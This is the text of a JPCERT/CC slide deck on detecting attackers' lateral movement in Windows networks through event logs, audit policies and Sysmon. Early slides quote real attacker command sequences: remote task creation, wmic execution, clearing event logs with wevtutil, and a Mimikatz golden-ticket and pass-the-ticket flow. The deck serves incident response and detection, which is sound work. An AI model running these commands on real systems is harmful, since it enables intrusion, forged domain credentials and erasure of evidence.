  • 30. Copyright ©2017 JPCERT/CC All rights reserved. Remote Command Execute Used Windows Command 29 at command > at [IP Address] 12:00 cmd /c "C:windowstempmal.exe" schtasks command > schtasks /create /tn [Task Name] /tr C:1.bat /sc onstart /ru System /s [IP Address]
  • 31. Copyright ©2017 JPCERT/CC All rights reserved. Remote Command Execute Used Windows Command 30 wmic command > wmic /node:[IP Address] /user:”[User Name]” /password:”[PASSWORD]” process call create “cmd /c c:WindowsSystem32net.exe user”
  • 32. Copyright ©2017 JPCERT/CC All rights reserved. The Managed Object Format (MOF) compiler parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. 31 Compile the MOF File mofcomp command > move %temp%mseinst.mof serverC$WINDOWS system32wbemsvmon.mof > mofcomp -N:rootdefault C:WINDOWSsystem32 wbemsvmon.mof >c:mofinst.txt > mofcomp -AUTORECOVER C:WINDOWSsystem32 wbemsvmon.mof >>c:mofinst.txt
  • 33. Copyright ©2017 JPCERT/CC All rights reserved. Lateral Movement: Delete Evidence • Delete files used by the attacker and logs Delete evidence 32 The most used command is del. For deleting the event log, wevtutil is used.
  • 34. Copyright ©2017 JPCERT/CC All rights reserved. Windows Command Used for Delete Evidence Rank Command Count 1 del 844 2 taskkill 80 3 klist 73 4 wevtutil 23 5 rd 15 33
  • 35. Copyright ©2017 JPCERT/CC All rights reserved.34 wevtutil command Delete event logs > wevtutil cl security > wevtutil qe security /f:text /q:""*[System[EventID =4624 or EventID=4769 or EventID=4672 or EventID=4768]] and *[System[TimeCreated[@ SystemTime>='2017-07-10T00:00:00.000']]]"" >c:windowssystem32log.txt Search logon event logs
  • 36. Copyright ©2017 JPCERT/CC All rights reserved.35 wevtutil command > wevtutil qe system /count:20 /rd:true /f:text /q: ""Event[System[(EventID=6005)]]"" |find ""Date"" > inf.txt Search start-up event logs
  • 37. Copyright ©2017 JPCERT/CC All rights reserved. An attacker uses Pass-the-ticket when spreading infection to other hosts —Pass-the-hash is rarely used Pass-the-ticket —Issues an unauthorized ticket that grants access without additional authentication —Golden ticket Use TGT (Ticket-Granting Tickets) —Silver ticket Use ST (Service Ticket) 36 Delete Evidence of Pass-the-Ticket
  • 38. Copyright ©2017 JPCERT/CC All rights reserved.37 Delete Evidence of Pass-the-Ticket klist command > klist purge
  • 39. Copyright ©2017 JPCERT/CC All rights reserved.38 Example of Command Execution Flow Example (Tick) > cd intellogs > whoami > klist > net use > klist purge > IntelGFX.exe "kerberos::golden /user:administrator /domain:[Domain] /sid:[SID] /krbtgt:[RC4 Key] /group:502 /ticket:0422.tck" exit > IntelGFX.exe "kerberos::ptt 0422.tck" exit > ping -n 1 > ping -n 1 > net use > dir$users Golden Ticket with Mimikatz Initial investigation Internal reconnaissance
  • 40. Copyright ©2017 JPCERT/CC All rights reserved.39 > copy bb.bat$windowssystem32 > net time > at 12:27 bb.bat > dir$windowssystem32inf.txt > move$windowssystem32inf.txt . > del$windowssystem32bb.bat > copy zt.exe$windowssystem32mscfg.exe > net time > at 12:33 mscfg.exe > dir$windowssystem32mscfg.exe > del$windowssystem32inf.txt > del$windowstasksat*.job > net use /del > dir > del zt.exe inf.txt bb.bat > dir > net use Spread of infection Delete evidence
  • 41. Copyright ©2017 JPCERT/CC All rights reserved.40 1 Overview of APT Incident and Lateral Movement 2 Tools Used by Attackers for Lateral Movement 3 Tracing Attacks 4 Analysis of Tools Used by Attackers
  • 42. Copyright ©2017 JPCERT/CC All rights reserved.41 What Do We Want to Know About the Attacks…? usedHosts Accounts/Privileges executedTools being accessedFiles/Intelligences Network traffics attackers coming backPossibility of
  • 43. Copyright ©2017 JPCERT/CC All rights reserved.42 What Do We Want to Know About the Attacks…? usedHosts Accounts/Privileges executedTools being accessedFiles/Intelligences Network traffics attackers coming backPossibility of Find in Logon History Find in Execution History Find in Access and Execution Histories
  • 44. Copyright ©2017 JPCERT/CC All rights reserved. Following records are taken by default on Windows: — Client OS Successful/Failed Logon Successful Logoff Successful Policy Modification ... that’s about it — Server OS Successful Authentication in addition to the above Some of the “Logon Histories” could be traced from the default logs. There may not be enough record to prove “Execution History” and “Access History”. 43 What Do We Want vs. What Can Be Found
  • 45. Copyright ©2017 JPCERT/CC All rights reserved. Default configuration is not enough. —Methods to cover the missing pieces are needed. —There are not so many documents that summarize methods and significant points for identifying threats. Some of the entities are not recorded by default, but it is possible to configure hosts to keep those records. —We do need to think about which entities we should cover to track the attacks. 44 Preparing For Investigation
  • 46. Copyright ©2017 JPCERT/CC All rights reserved. Tools and commands that were used in actual attacks were analyzed. —49 different tools that were frequently used in attack behaviors were selected. Approx. 1/3 were legitimate Windows tools. —Each of them was tested on a virtual network, and their execution “logs” were recorded. 45 Detecting Lateral Movement through Tracking Event Logs
  • 47. Copyright ©2017 JPCERT/CC All rights reserved. Tools and commands that were used in actual attacks were analyzed. —49 different tools that were frequently used in attack behaviors were selected. Approx. 1/3 were legitimate Windows tools. —Each of them was tested on a virtual network, and their execution “logs” were recorded. In most cases, additional tweaks were necessary to obtain enough records. 46 Detecting Lateral Movement through Tracking Event Logs
  • 48. Copyright ©2017 JPCERT/CC All rights reserved. Research report is available on JPCERT/CC website. — https://www.jpcert.or.jp/english/ pub/sr/ir_research.html — English/Japanese First published in 2016 Updated version 2017 available in Japanese — English version coming in December 47 Research Report
  • 49. Copyright ©2017 JPCERT/CC All rights reserved. The report shows some important aspects for tracing each tool. 48 Research Report Report screenshot in Japanese; English version coming soon.
  • 50. Copyright ©2017 JPCERT/CC All rights reserved. Windows Event Logs —Default and additional logs Registry Cache for performance improvements File System Activities File/Folder Access Histories Network Traffic 49 Elements Researched
  • 51. Copyright ©2017 JPCERT/CC All rights reserved. Event Logs were the most useful among the entities. 50 Research Results Audit Policy Sysmon Application Logs
  • 52. Copyright ©2017 JPCERT/CC All rights reserved. Event Logs were the most useful among the entities. There were some other useful information. 51 Research Results Audit Policy Sysmon Application Logs USN Journals Packet Capture
  • 53. Copyright ©2017 JPCERT/CC All rights reserved. Event Logs were the most useful among the entities. There were some other useful information. Research Results Audit Policy Sysmon Application Logs This session primarily focuses here. USN Journals Packet Capture
  • 54. Copyright ©2017 JPCERT/CC All rights reserved.53 1 Overview of APT Incident and Lateral Movement 2 Tools Used by Attackers for Lateral Movement 3 Tracing Attacks 4 Analysis of Tools Used by Attackers
  • 55. Copyright ©2017 JPCERT/CC All rights reserved. Additional settings are needed to record tools execution. Additional settings makes difference in amount of evidences that may be obtained. —Without those additional settings, evidences obtained from the compromised hosts may not be enough. 54 Analysis of Tools Used by Attackers
  • 56. Copyright ©2017 JPCERT/CC All rights reserved. Is a PowerShell script published on GitHub. Obtains plain text passwords stored on Group Policy settings. —Passwords can be stored when an update for MS14-025 is not applied. The following slides assume execution of the PowerShell scripts. 55 Example: Get-GPPPassword.ps1
  • 57. Copyright ©2017 JPCERT/CC All rights reserved. An example case of attack procedures. 56 Tracing Execution Histories Install remote access and/or other tools. (Out of scope of this session) Necessary information, such as AD domain names and domain controller FQDN, are obtained. 1. Create an Access Path 2. Investigate the Network 3. Permit Script Execution 4. Download the Script 5. Execute the Script 6. Remove Evidences Permit PowerShell script execution (which is disabled by default). Download the script to execute. Execute the downloaded script. Remove evidences of compromises.
  • 58. Copyright ©2017 JPCERT/CC All rights reserved.57 What Do We Want to Know About the Attacks…? usedHosts Accounts/Privileges executedTools being accessedFiles/Intelligences Network traffics attackers coming backPossibility of Find in Logon History Find in Execution History Find in Access and Execution Histories Looks similar to an ordinal Logon PowerShell was used in some ways, but not sure about what has happened
  • 59. Copyright ©2017 JPCERT/CC All rights reserved. (Out of scope of this session) Investigate compromised accounts and executed commands using Audit Policies 1. Create an Access Path 2. Investigate the Network 3. Permit Script Execution 4. Download the Script 5. Execute the Script 6. Remove Evidences Trace change on settings from PowerShell execution and registry modification histories Find script downloads from the network traffic logs Trace execution history from PowerShell and command execution histories Prepare not to lose trace logs even when attackers remove them from compromised hosts 58 Tracing Execution Histories An example case of attack procedures.
  • 60. Copyright ©2017 JPCERT/CC All rights reserved. (Out of scope of this session) Investigate compromised accounts and executed commands using Audit Policies 1. Create an Access Path 2. Investigate the Network 3. Permit Script Execution 4. Download the Script 5. Execute the Script 6. Remove Evidences Trace change on settings from PowerShell execution and registry modification histories Find script downloads from the network traffic logs Trace execution history from PowerShell and command execution histories Prepare not to lose trace logs even when attackers remove them from compromised hosts 59 Tracing Execution Histories An example case of attack procedures.
  • 61. Copyright ©2017 JPCERT/CC All rights reserved. Options available on Windows by default. —One of the places to get started. With default settings, not many events are actually audited. —Resulting in lack of evidences for tracing the attacks. 60 Audit Policies
  • 62. Copyright ©2017 JPCERT/CC All rights reserved. A software that is a part of Windows Sysinternals. — https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon The software is publicly available on the webpage above. 61 Sysmon
  • 63. Copyright ©2017 JPCERT/CC All rights reserved. A software that is a part of Windows Sysinternals. — https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon The software is publicly available on the webpage above. Information logged are shown below (based on version 6.10, released on May 2017) 62 Sysmon Process created /terminated Change of file creation time Network connection Driver loaded Image loaded Thread created in another process Read disk using “.” denotation Process accessed File creation Registry events File stream events Pipe events WMI events
  • 64. Copyright ©2017 JPCERT/CC All rights reserved. If logs are preserved: Evidences that cannot be recovered afterwards are recorded. If there is a case where the tool creates a temporary file: 63 Advantages of Log Analysis The file may be removed from the disk and cannot be recovered. When searching on the disk... “The file was created” in some ways, but not sure about exactly what was in the file When running forensics... Applications and command lines used for creating files may be recovered. From logs...
  • 65. Copyright ©2017 JPCERT/CC All rights reserved. Not a smart idea — “We have no idea about which logs we should keep. Simply just keep every single log” If “take everything and filter out later” is the policy, it is okay to keep everything. By default, old logs are overwritten when a log reaches its maximum size. — Domain Controller: 128MB — Others: 20MB Important evidences might get buried without appropriate configurations. — Logs for several weeks are stored without additional settings, but does not contain enough evidences — Logs may be overwritten within few hours with improperly configured additional settings 64 Appropriate Configurations
  • 66. Copyright ©2017 JPCERT/CC All rights reserved. Events that were “useful”: 65 Useful Events (“Security” Events) 4611 4624 4648 4776 4778 Logon 4634 4779 Logoff Process Executed 4688 Process Terminated 4689 Filtering Platform 5156 Account Management 4720 4722 4724 4726 4728 4737 4738 4670 4904 4905 4946 4947 Policy Change Use of Privileges 4672 4673 4674 4703 4768 4769 4771 File Sharing 5140 5142 5144 5145 Handles 4656 4658 4659 4660 4661 4663 4690 VSS 8222
  • 67. Copyright ©2017 JPCERT/CC All rights reserved. The following events are recorded by default and were useful: 66 Useful Events (Windows Standard Events) 7036 7040 7045 System 102 103 105 216 300 302 2001 2003 2005 2006 Application Microsoft-Windows -Application-Experience /Program-Telemetry Microsoft-Windows -Bits-Client /Operational Microsoft-Windows -DeviceSetupManager /Admin Microsoft-Windows -Kernel-PnP /Configuration Microsoft-Windows -TerminalServices -LocalSessionManager /Operational Microsoft-Windows -TerminalServices -RemoteConnection Manager/Operational Microsoft-Windows -TerminalServices -RDPClient/Operational Microsoft-Windows -Kernel-PnPConfig /Configuration Microsoft-Windows -PowerShell /Operational Microsoft-Windows -WinRM/Operational Microsoft-Windows -Windows-WMI-Activity /Operational 104 Logs Cleared
  • 68. Copyright ©2017 JPCERT/CC All rights reserved. Events that were “useful”: 67 Useful Events (Sysmon Events) Process Created 1 Use with “Security” audits Process Terminated 5 Use with “Security” audits File Creation Time Changed 2 Network Connection 3 Use with “Security” audits CreateRemoteThread 8 RawAccessRead 9 Process Accessed 10 Registry Events 12, 13
  • 69. Copyright ©2017 JPCERT/CC All rights reserved. Some properties might be common in both logs —Sysmon logs tend to have more useful details. —Some properties, such as “Token Elevation Types” appears only on Audit logs. 68 Audit Policies and Sysmon (1) Audit Sysmon
  • 70. Copyright ©2017 JPCERT/CC All rights reserved. (Out of scope of this session) Investigate compromised accounts and executed commands using Audit Policies 1. Create an Access Path 2. Investigate the Network 3. Permit Script Execution 4. Download the Script 5. Execute the Script 6. Remove Evidences Trace change on settings from PowerShell execution and registry modification histories Find script downloads from the network traffic logs Trace execution history from PowerShell and command execution histories Prepare not to lose trace logs even when attackers remove them from compromised hosts 69 Tracing Execution Histories An example case of attack procedures. Done for Registry Done “PowerShell was used” in some way
  • 71. Copyright ©2017 JPCERT/CC All rights reserved. By default, execution of PowerShell is logged, but not sure about what has happened on the PowerShell session. 70 PowerShell Logs
  • 72. Copyright ©2017 JPCERT/CC All rights reserved. With group policies, it is possible to configure Windows to record PowerShell logs on: —Windows 10, and —Previous Windows versions with required modules installed 71 PowerShell Logs
  • 73. Copyright ©2017 JPCERT/CC All rights reserved. The entire script will be recorded in Event Logs. Command histories are saved in a separate file. 72 PowerShell Logs Script Command History (%AppData%MicrosoftWindows PowerShellPSReadline)
  • 74. Copyright ©2017 JPCERT/CC All rights reserved. (Out of scope of this session) Investigate compromised accounts and executed commands using Audit Policies 1. Create an Access Path 2. Investigate the Network 3. Permit Script Execution 4. Download the Script 5. Execute the Script 6. Remove Evidences Trace change on settings from PowerShell execution and registry modification histories Find script downloads from the network traffic logs Trace execution history from PowerShell and command execution histories Prepare not to lose trace logs even when attackers remove them from compromised hosts 73 Tracing Execution Histories An example case of attack procedures. Done Done Done
  • 75. Copyright ©2017 JPCERT/CC All rights reserved. If there are network devices... — Logs from firewalls, web proxies, IDS/IPS, and so on are useful. 74 Investigating Network Activities
  • 76. Copyright ©2017 JPCERT/CC All rights reserved. If there are network devices... — Logs from firewalls, web proxies, IDS/IPS, and so on are useful. If there are no network devices that can produce useful logs… 75 Investigating Network Activities Sysmon Event 3 (“Network connection detected”) Access to Shared Folders (Logged on the Domain Controller) Windows Filtering Platform (Windows Firewall)
  • 77. Copyright ©2017 JPCERT/CC All rights reserved. Similar to process audits, network connections are logged in both audit and Sysmon logs 76 Audit Policies and Sysmon (2) Audit Sysmon
  • 78. Copyright ©2017 JPCERT/CC All rights reserved. History of file downloads may be found on: —PowerShell commands Invoke-WebRequest, System.Net.WebClient.DownloadFile, etc… Can be checked from PowerShell logs —Files related to web browsers Download history Temporary Internet Files 77 File Downloads It is possible to check them using Event Logs.
  • 79. Copyright ©2017 JPCERT/CC All rights reserved. (Out of scope of this session) Investigate compromised accounts and executed commands using Audit Policies 1. Create an Access Path 2. Investigate the Network 3. Permit Script Execution 4. Download the Script 5. Execute the Script 6. Remove Evidences Trace change on settings from PowerShell execution and registry modification histories Find script downloads from the network traffic logs Trace execution history from PowerShell and command execution histories Prepare not to lose trace logs even when attackers remove them from compromised hosts 78 Tracing Execution Histories An example case of attack procedures. Done Done Done Done
  • 80. Copyright ©2017 JPCERT/CC All rights reserved. File operations can be traced from the Audit logs. If the attacker creates a RAR or a ZIP file to create a single file to upload obtained files to his/her site... —The archive file is created temporarily, and then removed from the disk so it would not be found. 79 Tracking File Deletion
  • 81. Copyright ©2017 JPCERT/CC All rights reserved. Event Logs may be cleared easily if the compromised account has administrative rights. If logs are logged on a file, simply removing the log file will clear an evidence. 80 Clear Logs Need to consider a case where logs were cleared by attackers.
  • 82. Copyright ©2017 JPCERT/CC All rights reserved. Logs remaining on the hosts may be cleared when an attacker successfully logs onto them. Real-time log transfer to other hosts help administrators to trace events even when the logs were cleared from hosts locally. —Event subscription —Send using protocols such as Syslog —Back up log files periodically 81 To Trace Attacks Even When Logs Were Cleared
  • 83. Copyright ©2017 JPCERT/CC All rights reserved. (Out of scope of this session) Investigate compromised accounts and executed commands using Audit Policies 1. Create an Access Path 2. Investigate the Network 3. Permit Script Execution 4. Download the Script 5. Execute the Script 6. Remove Evidences Trace change on settings from PowerShell execution and registry modification histories Find script downloads from the network traffic logs Trace execution history from PowerShell and command execution histories Prepare not to lose trace logs even when attackers remove them from compromised hosts 82 Tracing Execution Histories An example case of attack procedures. Done Done Done Done Done
  • 84. Copyright ©2017 JPCERT/CC All rights reserved. It is necessary to tune up log sizes appropriately. —Otherwise, the precious evidences may get buried with other “garbage”. When attackers clear the logs stored on the compromised hosts, it becomes difficult to trace attacks. —It is important to think about gathering logs on other hosts securely. 83 “Cons” of the Method
  • 85. Copyright ©2017 JPCERT/CC All rights reserved. Execution histories of tools may be traced. —They cannot be traced by default settings. —Some “valuable” logs are recorded by simply modifying Windows settings and installing the free software 84 “Pros” of the Method
  • 86. Copyright ©2017 JPCERT/CC All rights reserved. This research primarily used “Windows standard features + Sysmon”. Adding other elements would improve analysis. —Monitoring networks —Monitoring endpoints etc... 85 To Obtain Better Logs
  • 87. Copyright ©2017 JPCERT/CC All rights reserved. Conclusion Typically, limited set of tools and commands are used for Lateral Movement. Many attack tools can be detected with audit policy and Sysmon. Our report would be helpful if you are investigating APT incidents. 86
  • 88. Copyright ©2017 JPCERT/CC All rights reserved.87 Thank you Q&A https://www.jpcert.or.jp/english/pub/sr/ir_research.html